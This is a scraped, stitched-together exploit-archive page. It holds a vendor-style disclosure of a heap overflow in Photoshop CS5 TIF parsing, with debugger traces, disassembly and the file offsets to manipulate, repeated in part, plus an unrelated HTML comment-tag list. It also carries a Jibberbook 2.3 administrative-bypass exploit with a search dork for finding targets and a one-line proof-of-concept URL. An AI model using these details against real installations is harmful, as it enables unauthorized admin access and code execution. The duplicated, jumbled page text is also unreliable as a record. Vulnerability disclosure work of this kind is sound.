address 0c2203c0 found in _HEAP @ c1c0000
HEAP_ENTRY Size Prev Flags UserPtr UserSize – state
0c2203b8 0281 0000 [01] 0c2203c0 01400 – (busy)

#copy source content
0:000gt; db 18943008
18943008 aa bb cc dd ee ff 16 0d-07 84 42 61 50 b8 64 36 ……….BaP.d6
18943018 1d 0f 88 44 62 51 38 a4-56 2d 17 8c 46 63 51 b8 …DbQ8.V-..FcQ.
18943028 e4 76 3d 1f 90 48 64 52-39 24 96 4d 27 94 4a 65 .v=..HdR9$.M’.Je
18943038 52 b9 64 b6 5d 2f 98 4c-66 53 39 a4 d6 6d 37 9c R.d.]/.LfS9..m7.
18943048 43 a0 4f f9 cc f6 7d 3f-a0 50 68 54 3a 25 16 8d C.O…}?.PhT:%..
18943058 47 a4 52 69 54 ba 65 36-9d 4f a8 54 67 b3 ba 95 G.RiT.e6.O.Tg…
18943068 56 ad 57 ac 56 6b 55 ba-e5 76 bd 5f b0 58 6c 56 V.W.VkU..v._.XlV
18943078 3b 24 da a9 65 b4 5a 6d-56 bb 65 b6 dd 6f b8 5c ;$..e.ZmV.e..o.
h24 Exploitable?/h2
============
Heap overflow druing memory copy, and the copy source content, copy size are controlled,
the copy dest heap is also contolled. It can cause arbitrary code execution.
5 Crash info:
===============

(44c.324): Access violation – code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=0000d67b ebx=00000005 ecx=00008afb edx=0bc38fc0 esi=1211cb10 edi=0bc344b8
eip=0f5c9896 esp=0012e694 ebp=0012e6e0 iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:Program FilesAdobeAdobe Photoshop
CS5Plug-insExtensionsMMXCore.8BX -
MMXCore!ENTRYPOINT1+0x1846e:
0f5c9896 660f7f6240 movdqa xmmword ptr [edx+40h],xmm4 ds:0023:0bc39000=????????????????????????????????
6 About Code Audit Labs:
=====================
Code Audit Labs secure your software,provide Professional include source
code audit and binary code audit service.
Code Audit Labs: You create value for customer,We protect your value

http://www.VulnHunt.com
http://blog.vulnhunt.com
http://t.qq.com/vulnhunt
http://weibo.com/vulnhunt
https://twitter.com/#!/vulnhunt
http://blog.vulnhunt.com/index.php/2012/05/09/cal-2011-0073_adobe-photoshop-extended-parsing-tif-heap-buffer-overflow-vu
lnerability/

References:

[ ASCII VERSION ]

Return to top

Adobe Photoshop EXTENDED parsing TIF heap buffer overflow vulnerability

 Topic:
Adobe Photoshop EXTENDED parsing TIF heap buffer overflow vulnerability
 Credit:
VulnHunt
 Date:
2012.05.09
 CWE:
N/A
 CVE:
CVE-2012-2028 (Show details)

Use CVE to see details like:
- CVSS2,
- Affected Software,
- References

Adobe Photoshop EXTENDED parsing TIF heap buffer overflow vulnerability

Discover: nine8 of code audit labs of vulnhunt.com with vulnhunt Fuzzing
CAL: CAL-2011-0073;

CVE:CVE-2012-2028

1 Affected Products
=================
Adobe Photoshop EXTENDED CS5 12.0
Adobe Photoshop EXTENDED CS5.1 12.1

2 Vulnerability Details
=====================
There are some problems when Photoshop parsing tif file. If Compression
Tag(0×100) is
replaced with ImageWidth Tag(0×100) or ImageLength Tag(0×101), the copy dest
heap size is
calculated with ImageWidth(replaced), ImageLength, SamplePerPixel or
ImageLength(replaced),
ImageWidth, SamplePerPixel, when copying strip bytes. This will cause heap overflow.

3 Analysis
=========

COPY Size: StripByteCounts file offset 0×144 (dword)
COPY Src : StripOffsets file offset 0×134 (dword)
COPY Dst Heap Size: ImageLength * ImageWidth(Vuln Seg) * SamplesPerPixel Or
ImageLength(Vuln Seg) * ImageWidth * SamplesPerPixel

ImageLength Value file offset 0×2A (word)
ImageWidth Value(be replaced) file offset 0×42 (word)
SamplesPerPixel Value file offset 0×72 (word)

IDA View: Photoshop.exe(12.0), IDA ImageBase: 0×400000

.text:01BF0250
.text:01BF0250 ; int __cdecl t_memcpy(void *Src, void *Dst, size_t Size)
.text:01BF0250 _t_memcpy proc near
.text:01BF0250 ; sub_6B7780+1F6p …
.text:01BF0250
.text:01BF0250 Src = dword ptr 4
.text:01BF0250 Dst = dword ptr 8
.text:01BF0250 Size = dword ptr 0Ch
.text:01BF0250
.text:01BF0250 mov eax, [esp+Size]
.text:01BF0254 mov ecx, [esp+Src]
.text:01BF0258 mov edx, [esp+Dst]
.text:01BF025C push eax ; Size
.text:01BF025D push ecx ; Src
.text:01BF025E push edx ; Dst
.text:01BF025F call memcpy
.text:01BF0264 add esp, 0Ch
.text:01BF0267 retn
.text:01BF0267 _t_memcpy endp

.text:00F5294F push edi ; int
.text:00F52950 movzx edi, word ptr [esi+0Ch]
.text:00F52954 push edi ; int
.text:00F52955 movzx edi, word ptr [esi+58h]
.text:00F52959 push edi ; __int16
.text:00F5295A movzx edi, word ptr [esi+0Eh]
.text:00F5295E push edi ; int
.text:00F5295F movzx edi, word ptr [esi+6]
.text:00F52963 push edi ; __int16
.text:00F52964 push ecx ; int
.text:00F52965 mov ecx, [esp+4Ch+arg_Size] ; ecx = arg0
.text:00F52969 push edx ; int
.text:00F5296A mov edx, [esp+50h+arg_8] ; edx = arg8
.text:00F5296E push ecx ; arg_size
.text:00F5296F push edx ; arg_dst
.text:00F52970 push eax ; arg_src, from file
.text:00F52971 call _t_CallBugMemcpyFunc ; lt;—– call bug memcpy func
.text:00F52977 movzx eax, ax
.text:00F5297A add esp, 30h

Windbg Debug

1) Attach photoshop.exe process.
2) set breakpoint, at 00F52971 call _t_CallBugMemcpyFunc
0:018gt; bu photoshop + 00b52971

3) Breakpoint 2 hit
eax=18943008 ebx=111a0028 ecx=00006660 edx=0c2203c0 esi=0012eee0 edi=00000001
eip=00f52971 esp=0012e6ec ebp=153a6360 iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00240202
Photoshop+0xb52971:
00f52971 ff1578881902 call dword ptr [Photoshop!boost::serialization::s
ingletonlt;std::multisetlt;boost::serialization::extended_type_info const *,boost
::serialization::detail::key_compare,std::allocatorlt;boost::serialization::exte
nded_type_info const *gt; gt; gt;::get_const_instance+0x546f78 (02198878)] ds:0023:0
2198878=0045bff0

#copy arguments
0:000gt; dd esp
(src) (dst) (size)
0012e6ec 18943008 0c2203c0 00006660 000000ae
0012e6fc 00000002 00000001 00000002 00000002
0012e70c 00000001 00000008 00000005 111a0028
0012e71c d56de0ac 0000897e 0012eee0 00000000
0012e72c 00006660 4084d555 01e3a8d4 153a6360
0012e73c 0012ea64 01d2d896 00000007 00f52ca9
0012e74c 00006660 111a0028 0c2203c0 00000000
0012e75c 0012eee0 0012ea70 00000000 0000015c

#copy dest heap size
0:000gt; !heap -p -a 0c2203c0
address 0c2203c0 found in _HEAP @ c1c0000
HEAP_ENTRY Size Prev Flags UserPtr UserSize – state
0c2203b8 0281 0000 [01] 0c2203c0 01400 – (busy)

#copy source content
0:000gt; db 18943008
18943008 aa bb cc dd ee ff 16 0d-07 84 42 61 50 b8 64 36 ……….BaP.d6
18943018 1d 0f 88 44 62 51 38 a4-56 2d 17 8c 46 63 51 b8 …DbQ8.V-..FcQ.
18943028 e4 76 3d 1f 90 48 64 52-39 24 96 4d 27 94 4a 65 .v=..HdR9$.M’.Je
18943038 52 b9 64 b6 5d 2f 98 4c-66 53 39 a4 d6 6d 37 9c R.d.]/.LfS9..m7.
18943048 43 a0 4f f9 cc f6 7d 3f-a0 50 68 54 3a 25 16 8d C.O…}?.PhT:%..
18943058 47 a4 52 69 54 ba 65 36-9d 4f a8 54 67 b3 ba 95 G.RiT.e6.O.Tg…
18943068 56 ad 57 ac 56 6b 55 ba-e5 76 bd 5f b0 58 6c 56 V.W.VkU..v._.XlV
18943078 3b 24 da a9 65 b4 5a 6d-56 bb 65 b6 dd 6f b8 5c ;$..e.ZmV.e..o.
h24 Exploitable?/h2
============
Heap overflow druing memory copy, and the copy source content, copy size are controlled,
the copy dest heap is also contolled. It can cause arbitrary code execution.
5 Crash info:
===============

(44c.324): Access violation – code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=0000d67b ebx=00000005 ecx=00008afb edx=0bc38fc0 esi=1211cb10 edi=0bc344b8
eip=0f5c9896 esp=0012e694 ebp=0012e6e0 iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:Program FilesAdobeAdobe Photoshop
CS5Plug-insExtensionsMMXCore.8BX -
MMXCore!ENTRYPOINT1+0x1846e:
0f5c9896 660f7f6240 movdqa xmmword ptr [edx+40h],xmm4 ds:0023:0bc39000=????????????????????????????????
6 About Code Audit Labs:
=====================
Code Audit Labs secure your software,provide Professional include source
code audit and binary code audit service.
Code Audit Labs: You create value for customer,We protect your value

http://www.VulnHunt.com
http://blog.vulnhunt.com
http://t.qq.com/vulnhunt
http://weibo.com/vulnhunt
https://twitter.com/#!/vulnhunt
http://blog.vulnhunt.com/index.php/2012/05/09/cal-2011-0073_adobe-photoshop-extended-parsing-tif-heap-buffer-overflow-vu
lnerability/

References:

[ ASCII VERSION ]

Return to top

Myspace Settles FTC Privacy Complaint

Currently we allow the following HTML tags in comments:

Single tags

These tags can be used alone and don’t need an ending tag.

br Defines a single line break

hr Defines a horizontal line

Matching tags

These require an ending tag – e.g. iitalic text/i

a Defines an anchor

b Defines bold text

big Defines big text

blockquote Defines a long quotation

caption Defines a table caption

cite Defines a citation

code Defines computer code text

em Defines emphasized text

fieldset Defines a border around elements in a form

h1 This is heading 1

h2 This is heading 2

h3 This is heading 3

h4 This is heading 4

h5 This is heading 5

h6 This is heading 6

i Defines italic text

p Defines a paragraph

pre Defines preformatted text

q Defines a short quotation

samp Defines sample computer code text

small Defines small text

span Defines a section in a document

s Defines strikethrough text

strike Defines strikethrough text

strong Defines strong text

sub Defines subscripted text

sup Defines superscripted text

u Defines underlined text

Return to top

Jibberbook 2.3 Administrative Bypass

 Topic:
Jibberbook 2.3 Administrative Bypass
 Dork:
allintext: “JibberBook created by chromasynthetic | Powered by MooTools, HTML Purifier, and Akismet”
 Credit:
L3b-r1′z
 Date:
2012.05.08
 CWE:
N/A
 CVE:
N/A

#################################################
# Exploit Title : jibberbook Bypass Admin Vulnerability
#
# Author : IrIsT.Ir Sec4Ever.com
#
# Discovered By : L3b-r1′z
#
# Home : http://IrIsT.Ir http://Sec4Ever.com
#
# P Blob : http://L3b-r1z.com/
#
# Software Link : http://jibberbook.com/
#
# Security Risk : High
#
# Version : 2.3
#
# Tested on : winXP
#
# Dork : allintext: “JibberBook created by chromasynthetic |
Powered by MooTools, HTML Purifier, and Akismet”
#
# 1) SCript
# 2) Info Vulnerabilty
# 3) P0c
#
#
#################################################
#
# 1) SCript:
# JibberBook allow the visitor to make comment or any thing like how
visitor like website :)
# or any msg for admin of site.
#
#
#################################################
#
# 2) Info Vulnerability :
# This exploit allow attacker to log into the admin panel with out write
username or password .
# Look Into The File index.php In jibberbook-2.3admin :
#
# require_once(‘inc/secure.php’);
# require_once(‘../inc/includes.php’);
# includes(array(‘admin/actions/load.php’,
‘admin/actions/transformxml.php’));
#
# $_SESSION['referer'] = ‘http://’ . $_SERVER['HTTP_HOST'] .
$_SERVER['REQUEST_URI'];
# require_once(‘inc/header.php’);
# ?
# We have Require to File Named Secure , Lets Check it :) :
#
# session_start();
# if (!isset($_SESSION['admin']))
# {
# if (is_file(realpath(‘login_form.php’))) {
# $url = ‘http://’ . $_SERVER['HTTP_HOST'] .
dirname($_SERVER['REQUEST_URI'] . ‘x’) . ‘/login_form.php’;
# } else {
# $url = ‘http://’ . $_SERVER['HTTP_HOST'] .
dirname(dirname($_SERVER['REQUEST_URI'] . ‘x’)) . ‘/login_form.php’;
# }
# header(“Location: $url”);
# exit();
# } else {
# $loggedin = true;
# }
#
# The file don’t have any secure here :P.
# Cz Look To Below Header , We Have else Loggedin = True, its mean if the
attacker not admin required to login_form.php
# else , Loggedin = true , Admin Redirect to Admin panel :).
#
#
#################################################
#
# 3) p0c :
#
# Site.Com/Admin/Login_form.php?loggedin=true
#
#################################################
#
#
# Special Thx To : Irist Team Sec4Ever Team .
#
#################################################
#
#
# Greet’z : b0x, Virus-Ra3ch, Damane2011, Hacker-1420, The Injector,
N4ss1m, hacker-1420.
# Sec4ever, B07 M4S73R, Stalk3r, Hacker-Dz, Mr.XKILLeR, The Viper, Th3
Killer Dz.
# Over-X 3, And All My Friends.
#
#################################################

–
Proud To Be Lebanese :D

I Will Miss You My Friends : b0x, Virus-Ra3ch, Damane2011, Hacker-1420, The
Injector, N4ss1m, Sec4ever, B07 M4S73R, Stalk3r, Hacker-Dz, Mr.XKILLeR, The
Viper, Th3 Killer Dz, Over-X 3, And All My Friends.

Sec4ever.com.

References:

[ ASCII VERSION ]

Return to top